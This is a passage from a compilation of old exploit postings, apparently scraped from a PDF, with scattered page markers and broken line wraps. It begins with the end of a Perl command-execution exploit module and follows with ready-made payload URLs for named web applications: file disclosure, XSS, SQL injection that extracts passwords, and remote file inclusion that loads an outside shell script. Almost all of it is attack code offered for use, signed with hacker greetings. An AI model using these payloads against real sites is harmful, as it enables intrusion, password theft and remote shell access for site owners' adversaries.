{
$fill_extract_result=0;
$end_break=1;
}
if ($fill_extract_result>0) {
push(@extract_result,$results[$i]); }
if ($results[$i] =~ /\<body class=\"patternNoViewPage\"\>/)
{
$fill_extract_result=1;
}
$i++;
}
if (@extract_result < 3) {
$self->PrintLine("[*] Target may be not vulnerable, or you have used ';' char in CMD");
} else {
for ($i=1;$i<@extract_result;$i+=2) {
chomp @extract_result;
$self->PrintLine("$extract_result[$i]"); }
} }
$s->Close();
return;
}
sub VHost {
my $self = shift;
my $name = $self->GetVar('VHOST') || $self->GetVar('RHOST'); return $name;
}
1;
Trang 2# milw0rm.com [2006-08-02]
vns3curity(HCE)
Ultimate HelpDesk (XSS/Local File Disclosure) Vulnerabilities
HTML Code:
******************************************************************
*************
# Title : Ultimate HelpDesk All Version (Source/XSS) Vulnerabilities
# Author : ajann
# Contact : :(
******************************************************************
*************
Login Before Vulnerabilities.:
[[SOURCE]]] -
http://[target]/[path]//getfile.asp?filename=[SQL]
Example:
//getfile.asp?filename= /index.asp
//getfile.asp?filename= / / /boot.ini
[[/SOURCE]]]
[[XSS]]] -
http://[target]/[path]//index.asp?status=open&page=tickets&title=39&searchparam
=&u_input=&u_field=&intpage=2&keyword=[XSS]
Trang 3Example:
//index.asp?status=open&page=tickets&title=39&searchparam=&u_input=&u_fiel d=&intpage=2&keyword=%22%3E%3Cscript%3Ealert%28%27ajann%27%29%3 B%3C%2Fscript%3E
Black_hat_cr(HCE)
Ultimate PHP Board <= 2.0 Remote file inclusion
google: "Powered by UPB"
xploit:
Code:
<server>/<path>/includes/header_simple.php?_CONFIG[skin_dir]=con_shell
Black_hat_cr(HCE)
Uploader & Downloader 3.0 (id_user) Remote SQL Injection Vulnerability
Code:
##################################################################
######
# uploader&downloader v3 Remote SQL Injection Vulnerability
#
# Download: ftp://ftp1.comscripts.com/PHP/1892_uploader-30.zip
#
# Found By: the master
#
##################################################################
######
# exploit:
#
#
http://[Target]/[Path]/administration/administre2.php?id_user=-1%20UNION%20SELECT%20null,passe,null,null%20FROM%20connect_upload _fichier%20WHERE%20id_user=1
#
# Greetz: str0ke , Dr Max Virus , Kacper
Trang 4######
black_hat_cr(HCE)
Valdersoft Shopping Cart 3.0 Multiple Remote File Include Vulnerabilities
Code:
*Valdersoft Shopping Cart v3.0 (E-Commerce Software)*****[
commonIncludePath ] Remote File Include*
******************************************************************
************************************
*******************************************
+class : Remote File Include Vulnerability*
*******************************************
+Author : mdx *
****************************************************************** *********** +Files : * +/common_include/common.php , /include/common.php, /admin/include/common.php* * * ****************************************************************** *********** +code : *
+ *
+ include ( $commonIncludePath."common.php" ); *
+ *
****************************************************************** *************************** + Exploit : *
+*****************************************************************
***************************+
+
http://www.site.***/[path]/admin/include/common.php?commonIncludePath=http: //mdxshell.txt?*+
Trang 5***************************+
+
http://www.site.***/[path]/include/common.php?commonIncludePath=http://mdxs
hell.txt?*******+
+*****************************************************************
***************************+
+
http://www.site.***/[path]/common_include/common.php?commonIncludePath=ht
tp://mdxshell.txt?+
+*****************************************************************
***************************+
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+++++++++++++++++++++++++++++++++++
===========================================================
===================================
? *
? *
? Thanks ; Cyber-WARRIOR TIM USERS, xoron , prohack ,leak , ozii , sakkure ,
abbad, dreamlord*
? *
?/////////////////////////////////////////////////////////////////////////////////////////////
? -specials thanks stroke
,SHiKaA -*
******************************************************************
****************************
******************* *
******************* KORKULARINIZ SADECE
KABUSLARINIZDIR *
******************* *
******************* Turkish Hacker by mdx *
******************* *
******************* Korkmak Kurtulmak Degildir *
******************* *
******************************************************************
****************************